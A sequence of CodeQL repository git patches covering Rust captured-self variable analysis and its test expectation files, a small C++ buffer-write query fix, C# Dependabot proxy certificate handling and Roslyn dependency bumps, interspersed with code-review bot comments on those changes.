@@ -136,11 +136,13 @@ definition | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | -| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | -| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | -| variables.rs:514:9:514:9 | z | variables.rs:514:9:514:9 | z | -| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | +| variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | +| variables.rs:519:9:519:9 | x | variables.rs:519:9:519:9 | x | +| variables.rs:523:9:523:9 | z | variables.rs:523:9:523:9 | z | +| variables.rs:532:10:532:18 | SelfParam | variables.rs:532:15:532:18 | self | read | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | 
@@ -264,12 +266,15 @@ read | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:472:19:472:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:503:5:503:5 | a | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | -| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | -| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | -| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:495:9:495:9 | f | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:496:9:496:9 | f | +| variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:511:15:511:15 | a | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:512:5:512:5 | a | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:513:15:513:15 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variables.rs:515:15:515:15 | a | +| variables.rs:519:9:519:9 | x | variables.rs:519:9:519:9 | x | variables.rs:521:15:521:15 | x | +| variables.rs:532:10:532:18 | SelfParam | variables.rs:532:15:532:18 | self | variables.rs:533:6:533:9 | self | firstRead | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | 
variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | @@ -370,10 +375,12 @@ firstRead | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | -| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | -| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | -| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:495:9:495:9 | f | +| variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:511:15:511:15 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variables.rs:515:15:515:15 | a | +| variables.rs:519:9:519:9 | x | variables.rs:519:9:519:9 | x | variables.rs:521:15:521:15 | x | +| variables.rs:532:10:532:18 | SelfParam | variables.rs:532:15:532:18 | self | variables.rs:533:6:533:9 | self | lastRead | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | 
@@ -475,10 +482,12 @@ lastRead | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:472:19:472:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | -| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | -| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | -| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:496:9:496:9 | f | +| variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:513:15:513:15 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variables.rs:515:15:515:15 | a | +| variables.rs:519:9:519:9 | x | variables.rs:519:9:519:9 | x | variables.rs:521:15:521:15 | x | +| variables.rs:532:10:532:18 | SelfParam | variables.rs:532:15:532:18 | self | variables.rs:533:6:533:9 | self | adjacentReads | variables.rs:35:9:35:10 | x3 | variables.rs:35:9:35:10 | x3 | variables.rs:36:15:36:16 | x3 | variables.rs:38:9:38:10 | x3 | | variables.rs:43:9:43:10 | x4 | variables.rs:43:9:43:10 | x4 | variables.rs:44:15:44:16 | x4 | variables.rs:49:15:49:16 | x4 | 
@@ -506,8 +515,9 @@ adjacentReads | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:464:19:464:19 | x | variables.rs:472:19:472:19 | x | | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | variables.rs:470:19:470:19 | x | | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | variables.rs:472:19:472:19 | x | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | variables.rs:503:5:503:5 | a | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:503:5:503:5 | a | variables.rs:504:15:504:15 | a | +| variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:495:9:495:9 | f | variables.rs:496:9:496:9 | f | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:511:15:511:15 | a | variables.rs:512:5:512:5 | a | +| variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:512:5:512:5 | a | variables.rs:513:15:513:15 | a | phi | variables.rs:191:9:191:44 | [match(true)] phi | variables.rs:191:9:191:44 | a3 | variables.rs:191:22:191:23 | a3 | | variables.rs:191:9:191:44 | [match(true)] phi | variables.rs:191:9:191:44 | a3 | variables.rs:191:42:191:43 | a3 | @@ -583,4 +593,4 @@ assigns | variables.rs:438:9:438:9 | i | variables.rs:438:13:438:13 | 1 | | variables.rs:450:9:450:9 | x | variables.rs:450:13:450:13 | 2 | | variables.rs:454:9:454:9 | x | variables.rs:454:13:454:13 | 3 | -| variables.rs:505:5:505:5 | a | variables.rs:505:9:505:17 | [...] | +| variables.rs:514:5:514:5 | a | variables.rs:514:9:514:17 | [...] | diff --git a/rust/ql/test/library-tests/variables/variables.expected b/rust/ql/test/library-tests/variables/variables.expected index 0ccdbfb55be..63abece5a72 100644 --- a/rust/ql/test/library-tests/variables/variables.expected +++ b/rust/ql/test/library-tests/variables/variables.expected 
@@ -1,4 +1,8 @@ testFailures +| variables.rs:493:13:493:16 | self | Unexpected result: read_access=self | +| variables.rs:493:25:493:25 | n | Unexpected result: read_access=n | +| variables.rs:495:9:495:9 | f | Unexpected result: read_access=f | +| variables.rs:496:9:496:9 | f | Unexpected result: read_access=f | variable | variables.rs:3:14:3:14 | s | | variables.rs:7:14:7:14 | i | @@ -96,12 +100,15 @@ variable | variables.rs:462:9:462:9 | x | | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | self | -| variables.rs:492:13:492:13 | a | +| variables.rs:490:23:490:26 | self | +| variables.rs:491:17:491:17 | f | +| variables.rs:491:22:491:22 | n | | variables.rs:501:13:501:13 | a | -| variables.rs:510:9:510:9 | x | -| variables.rs:514:9:514:9 | z | -| variables.rs:523:15:523:18 | self | -| variables.rs:529:11:529:11 | a | +| variables.rs:510:13:510:13 | a | +| variables.rs:519:9:519:9 | x | +| variables.rs:523:9:523:9 | z | +| variables.rs:532:15:532:18 | self | +| variables.rs:538:11:538:11 | a | variableAccess | variables.rs:4:20:4:20 | s | variables.rs:3:14:3:14 | s | | variables.rs:8:20:8:20 | i | variables.rs:7:14:7:14 | i | 
@@ -251,22 +258,26 @@ variableAccess | variables.rs:472:19:472:19 | x | variables.rs:462:9:462:9 | x | | variables.rs:483:16:483:19 | self | variables.rs:482:20:482:23 | self | | variables.rs:487:9:487:12 | self | variables.rs:486:11:486:14 | self | -| variables.rs:493:15:493:15 | a | variables.rs:492:13:492:13 | a | -| variables.rs:494:5:494:5 | a | variables.rs:492:13:492:13 | a | -| variables.rs:495:15:495:15 | a | variables.rs:492:13:492:13 | a | -| variables.rs:496:5:496:5 | a | variables.rs:492:13:492:13 | a | -| variables.rs:497:15:497:15 | a | variables.rs:492:13:492:13 | a | +| variables.rs:493:13:493:16 | self | variables.rs:490:23:490:26 | self | +| variables.rs:493:25:493:25 | n | variables.rs:491:22:491:22 | n | +| variables.rs:495:9:495:9 | f | variables.rs:491:17:491:17 | f | +| variables.rs:496:9:496:9 | f | variables.rs:491:17:491:17 | f | | variables.rs:502:15:502:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:504:15:504:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:506:15:506:15 | a | variables.rs:501:13:501:13 | a | -| variables.rs:511:20:511:20 | x | variables.rs:510:9:510:9 | x | -| variables.rs:512:15:512:15 | x | variables.rs:510:9:510:9 | x | -| variables.rs:515:20:515:20 | z | variables.rs:514:9:514:9 | z | -| variables.rs:524:6:524:9 | self | variables.rs:523:15:523:18 | self | -| variables.rs:530:3:530:3 | a | variables.rs:529:11:529:11 | a | -| variables.rs:532:13:532:13 | a | variables.rs:529:11:529:11 | a | +| variables.rs:511:15:511:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:512:5:512:5 | a | variables.rs:510:13:510:13 | a | +| variables.rs:513:15:513:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | +| variables.rs:515:15:515:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:520:20:520:20 | x | 
variables.rs:519:9:519:9 | x | +| variables.rs:521:15:521:15 | x | variables.rs:519:9:519:9 | x | +| variables.rs:524:20:524:20 | z | variables.rs:523:9:523:9 | z | +| variables.rs:533:6:533:9 | self | variables.rs:532:15:532:18 | self | +| variables.rs:539:3:539:3 | a | variables.rs:538:11:538:11 | a | +| variables.rs:541:13:541:13 | a | variables.rs:538:11:538:11 | a | variableWriteAccess | variables.rs:23:5:23:6 | x2 | variables.rs:21:13:21:14 | x2 | | variables.rs:30:5:30:5 | x | variables.rs:28:13:28:13 | x | @@ -277,8 +288,8 @@ variableWriteAccess | variables.rs:438:9:438:9 | i | variables.rs:436:13:436:13 | i | | variables.rs:450:9:450:9 | x | variables.rs:446:13:446:13 | x | | variables.rs:454:9:454:9 | x | variables.rs:446:13:446:13 | x | -| variables.rs:496:5:496:5 | a | variables.rs:492:13:492:13 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variableReadAccess | variables.rs:4:20:4:20 | s | variables.rs:3:14:3:14 | s | | variables.rs:8:20:8:20 | i | variables.rs:7:14:7:14 | i | 
@@ -410,18 +421,22 @@ variableReadAccess | variables.rs:472:19:472:19 | x | variables.rs:462:9:462:9 | x | | variables.rs:483:16:483:19 | self | variables.rs:482:20:482:23 | self | | variables.rs:487:9:487:12 | self | variables.rs:486:11:486:14 | self | -| variables.rs:493:15:493:15 | a | variables.rs:492:13:492:13 | a | -| variables.rs:494:5:494:5 | a | variables.rs:492:13:492:13 | a | -| variables.rs:495:15:495:15 | a | variables.rs:492:13:492:13 | a | -| variables.rs:497:15:497:15 | a | variables.rs:492:13:492:13 | a | +| variables.rs:493:13:493:16 | self | variables.rs:490:23:490:26 | self | +| variables.rs:493:25:493:25 | n | variables.rs:491:22:491:22 | n | +| variables.rs:495:9:495:9 | f | variables.rs:491:17:491:17 | f | +| variables.rs:496:9:496:9 | f | variables.rs:491:17:491:17 | f | | variables.rs:502:15:502:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:504:15:504:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:506:15:506:15 | a | variables.rs:501:13:501:13 | a | -| variables.rs:512:15:512:15 | x | variables.rs:510:9:510:9 | x | -| variables.rs:524:6:524:9 | self | variables.rs:523:15:523:18 | self | -| variables.rs:530:3:530:3 | a | variables.rs:529:11:529:11 | a | -| variables.rs:532:13:532:13 | a | variables.rs:529:11:529:11 | a | +| variables.rs:511:15:511:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:512:5:512:5 | a | variables.rs:510:13:510:13 | a | +| variables.rs:513:15:513:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:515:15:515:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:521:15:521:15 | x | variables.rs:519:9:519:9 | x | +| variables.rs:533:6:533:9 | self | variables.rs:532:15:532:18 | self | +| variables.rs:539:3:539:3 | a | variables.rs:538:11:538:11 | a | +| variables.rs:541:13:541:13 | a | variables.rs:538:11:538:11 | a | variableInitializer | variables.rs:16:9:16:10 | x1 | variables.rs:16:14:16:16 | "a" | | 
variables.rs:21:13:21:14 | x2 | variables.rs:21:18:21:18 | 4 | @@ -469,11 +484,12 @@ variableInitializer | variables.rs:437:9:437:13 | block | variables.rs:437:17:439:5 | { ... } | | variables.rs:446:13:446:13 | x | variables.rs:446:17:446:17 | 1 | | variables.rs:462:9:462:9 | x | variables.rs:462:13:462:13 | 1 | -| variables.rs:492:13:492:13 | a | variables.rs:492:17:492:35 | MyStruct {...} | -| variables.rs:501:13:501:13 | a | variables.rs:501:17:501:25 | [...] | -| variables.rs:510:9:510:9 | x | variables.rs:510:13:510:14 | 16 | -| variables.rs:514:9:514:9 | z | variables.rs:514:13:514:14 | 17 | -| variables.rs:529:11:529:11 | a | variables.rs:529:15:529:33 | MyStruct {...} | +| variables.rs:491:17:491:17 | f | variables.rs:491:21:494:9 | \|...\| ... | +| variables.rs:501:13:501:13 | a | variables.rs:501:17:501:35 | MyStruct {...} | +| variables.rs:510:13:510:13 | a | variables.rs:510:17:510:25 | [...] | +| variables.rs:519:9:519:9 | x | variables.rs:519:13:519:14 | 16 | +| variables.rs:523:9:523:9 | z | variables.rs:523:13:523:14 | 17 | +| variables.rs:538:11:538:11 | a | variables.rs:538:15:538:33 | MyStruct {...} | capturedVariable | variables.rs:400:9:400:9 | x | | variables.rs:410:13:410:13 | x | diff --git a/rust/ql/test/library-tests/variables/variables.rs b/rust/ql/test/library-tests/variables/variables.rs index 61bd3d72002..73d350f2496 100644 --- a/rust/ql/test/library-tests/variables/variables.rs +++ b/rust/ql/test/library-tests/variables/variables.rs @@ -486,6 +486,15 @@ impl MyStruct { fn id(self) -> Self { self // $ read_access=self } + + fn my_method(&mut self) { + let mut f = |n| { + // Capture of `self` + self.val += n; + }; + f(3); + f(4); + } } fn structs() { From d38975bb99b746bd6fd27e947279ad003d75d147 Mon Sep 17 00:00:00 2001 
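Review bot: The new `my_method` body carries no inline expectation comments, unlike `id` just above it (`self // $ read_access=self`), and this same patch records the four resulting `Unexpected result: read_access=…` rows under `testFailures` in variables.expected. Annotating the statements keeps that section empty and makes the intended accesses readable in the test itself: `self.val += n; // $ read_access=self read_access=n` and `f(3); // $ read_access=f` (likewise for `f(4);`). Whether the declarations of `f` and `n` need a tag of their own depends on conventions elsewhere in variables.rs, outside this hunk.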
From: Calum Grant Date: Fri, 6 Dec 2024 13:07:58 +0000 Subject: [PATCH 0868/1267] C++: Use getType() instead of getUnderlyingType() --- cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql b/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql index e89ffac906e..69e6e675aa0 100644 --- a/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql +++ b/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql @@ -26,7 +26,7 @@ where bw.hasExplicitLimit() and // has an explicit size limit destSize = max(getBufferSize(bw.getDest(), _)) and bw.getExplicitLimit() > destSize and // but it's larger than the destination - not bw.getDest().getUnderlyingType().stripType() instanceof ErroneousType // destSize may be incorrect + not bw.getDest().getType().stripType() instanceof ErroneousType // destSize may be incorrect select bw, "This '" + bw.getBWDesc() + "' operation is limited to " + bw.getExplicitLimit() + " bytes but the destination is only " + destSize + " bytes." From ed68423d6eed6aa114240d2d51ee361e48a69b16 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Fri, 6 Dec 2024 14:12:27 +0100 Subject: [PATCH 0869/1267] Rust: Handle captured `self` parameter in variable implementation --- rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll | 5 ++++- rust/ql/test/library-tests/variables/Ssa.expected | 5 +++++ rust/ql/test/library-tests/variables/variables.expected | 2 ++ 3 files changed, 11 insertions(+), 1 deletion(-) diff --git a/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll index c93fb2d832c..b21cf924204 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll 
@@ -139,6 +139,9 @@ module Impl { */ IdentPat getPat() { variableDecl(definingNode, result, name) } + /** Gets the enclosing CFG scope for this variable declaration. */ + CfgScope getEnclosingCfgScope() { result = definingNode.getEnclosingCfgScope() } + /** Gets the `let` statement that introduces this variable, if any. */ LetStmt getLetStmt() { this.getPat() = result.getPat() } @@ -452,7 +455,7 @@ module Impl { Variable getVariable() { result = v } /** Holds if this access is a capture. */ - predicate isCapture() { this.getEnclosingCfgScope() != v.getPat().getEnclosingCfgScope() } + predicate isCapture() { this.getEnclosingCfgScope() != v.getEnclosingCfgScope() } override string toString() { result = name } diff --git a/rust/ql/test/library-tests/variables/Ssa.expected b/rust/ql/test/library-tests/variables/Ssa.expected index 714c5e34a4e..e126ca45c3a 100644 --- a/rust/ql/test/library-tests/variables/Ssa.expected +++ b/rust/ql/test/library-tests/variables/Ssa.expected @@ -136,7 +136,9 @@ definition | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | +| variables.rs:490:18:490:26 | SelfParam | variables.rs:490:23:490:26 | self | | variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | +| variables.rs:491:21:494:9 | self | variables.rs:490:23:490:26 | self | | variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | | variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | | variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | 
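Review bot: `isCapture()` now compares against `v.getEnclosingCfgScope()` instead of `v.getPat().getEnclosingCfgScope()`, but neither doc comment says why the two differ. Going by the commit title and the `IdentPat getPat()` signature, the old form presumably had no result for a `self` parameter; that is worth recording on the predicate, e.g. `/** Holds if this access is a capture, that is, it occurs in a different CFG scope than the variable's defining node (which need not be an identifier pattern, e.g. a self parameter). */`. Both hunks sit inside `module Impl`, and the classes they touch start and end outside them.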
@@ -268,6 +270,7 @@ read | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | | variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:495:9:495:9 | f | | variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:496:9:496:9 | f | +| variables.rs:491:21:494:9 | self | variables.rs:490:23:490:26 | self | variables.rs:493:13:493:16 | self | | variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | | variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:511:15:511:15 | a | | variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:512:5:512:5 | a | @@ -376,6 +379,7 @@ firstRead | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | | variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:495:9:495:9 | f | +| variables.rs:491:21:494:9 | self | variables.rs:490:23:490:26 | self | variables.rs:493:13:493:16 | self | | variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | | variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:511:15:511:15 | a | | variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variables.rs:515:15:515:15 | a | 
@@ -483,6 +487,7 @@ lastRead | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | | variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:496:9:496:9 | f | +| variables.rs:491:21:494:9 | self | variables.rs:490:23:490:26 | self | variables.rs:493:13:493:16 | self | | variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | | variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:513:15:513:15 | a | | variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variables.rs:515:15:515:15 | a | diff --git a/rust/ql/test/library-tests/variables/variables.expected b/rust/ql/test/library-tests/variables/variables.expected index 63abece5a72..d0141b2e1e8 100644 --- a/rust/ql/test/library-tests/variables/variables.expected +++ b/rust/ql/test/library-tests/variables/variables.expected @@ -496,9 +496,11 @@ capturedVariable | variables.rs:418:13:418:13 | y | | variables.rs:426:13:426:13 | z | | variables.rs:436:13:436:13 | i | +| variables.rs:490:23:490:26 | self | capturedAccess | variables.rs:403:19:403:19 | x | | variables.rs:413:19:413:19 | x | | variables.rs:421:9:421:9 | y | | variables.rs:429:9:429:9 | z | | variables.rs:438:9:438:9 | i | +| variables.rs:493:13:493:16 | self | From 653d68ea9472b93be390545b27381c98ed7756da Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Fri, 6 Dec 2024 13:13:15 +0000 Subject: [PATCH 0870/1267] C#: Explicitly close writer in `DependabotProxy` --- .../DependabotProxy.cs | 1 + 1 file changed, 1 insertion(+) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 09f5a15a21d..f3d92b38f0c 100644 
--- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -62,6 +62,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching using var writer = certFile.CreateText(); writer.Write(cert); + writer.Close(); logger.LogInfo($"Stored Dependabot proxy certificate at {result.CertificatePath}"); From c8ccfe40a550026411ecde0a8bc78b7486a4407e Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Fri, 6 Dec 2024 13:13:41 +0000 Subject: [PATCH 0871/1267] C#: Create certificate from string, rather than file --- .../DependabotProxy.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index f3d92b38f0c..895bd313ac3 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -66,7 +66,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching logger.LogInfo($"Stored Dependabot proxy certificate at {result.CertificatePath}"); - result.Certificate = new X509Certificate2(result.CertificatePath); + result.Certificate = X509Certificate2.CreateFromPem(cert); } return result; From 2816234359a47ae1142c190d3a847bb98217d216 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 10:47:41 +0100 Subject: [PATCH 0872/1267] C#: Update Roslyn. --- csharp/paket.dependencies | 7 +- csharp/paket.lock | 156 +++++++++++++++++++++++--------------- csharp/paket.main.bzl | 60 +++++++-------- 3 files changed, 126 insertions(+), 97 deletions(-) diff --git a/csharp/paket.dependencies b/csharp/paket.dependencies index d3e2988bba6..824e2d73a83 100644 --- a/csharp/paket.dependencies +++ b/csharp/paket.dependencies 
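Review bot: `writer.Close()` is called on a writer declared with `using var`, so the flush that matters rests on a separate explicit call while disposal still happens at the end of the enclosing scope. A block-scoped writer ties the flush to the scope and needs no extra call: `using (var writer = certFile.CreateText()) { writer.Write(cert); }`. If the explicit call stays, a comment such as `// flush and close now: the file is read back below` would explain it to the next reader. The enclosing method starts and ends outside the hunk.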
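Review bot: `X509Certificate2.CreateFromPem(cert)` runs only after the same text has been written to `result.CertificatePath` and logged as stored, so a value that is not a valid PEM certificate leaves that file on disk and then throws `CryptographicException` out of this method. Since parsing no longer depends on the file, moving `result.Certificate = X509Certificate2.CreateFromPem(cert);` above `using var writer = certFile.CreateText();` keeps the stored file and the in-memory certificate in agreement. Where `cert` comes from and whether the caller handles the exception are not visible in this hunk.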
@@ -4,7 +4,6 @@ source https://api.nuget.org/v3/index.json # behave like nuget in choosing transitive dependency versions strategy: min -nuget MessagePack >= 2.5.187 nuget Basic.CompilerLog.Util nuget Mono.Posix.NETStandard nuget Newtonsoft.Json @@ -12,9 +11,9 @@ nuget xunit nuget xunit.runner.visualstudio nuget xunit.runner.utility nuget Microsoft.NET.Test.Sdk -nuget Microsoft.CodeAnalysis.CSharp 4.9.2 -nuget Microsoft.CodeAnalysis 4.9.2 -nuget Microsoft.Build 17.8.3 +nuget Microsoft.CodeAnalysis.CSharp 4.12.0 +nuget Microsoft.CodeAnalysis 4.12.0 +nuget Microsoft.Build 17.12.6 nuget Microsoft.Win32.Primitives nuget System.Net.Primitives nuget System.Security.Principal diff --git a/csharp/paket.lock b/csharp/paket.lock index 1bfc7465d12..b80defd8c43 100644 --- a/csharp/paket.lock +++ b/csharp/paket.lock 
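Review bot: Dropping `nuget MessagePack >= 2.5.187` leaves the MessagePack floor to whatever Basic.CompilerLog.Util declares, and with `strategy: min` the lock file in this same patch moves MessagePack from 2.5.192 back to 2.5.187. If the explicit floor was there on purpose (for example to stay above a release with a known advisory), keep the line and say why with a comment above it, e.g. `# explicit floor: do not rely on the transitive minimum`. If it is now redundant because the transitive requirement is the same, the commit description should say so, since the title mentions only Roslyn.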
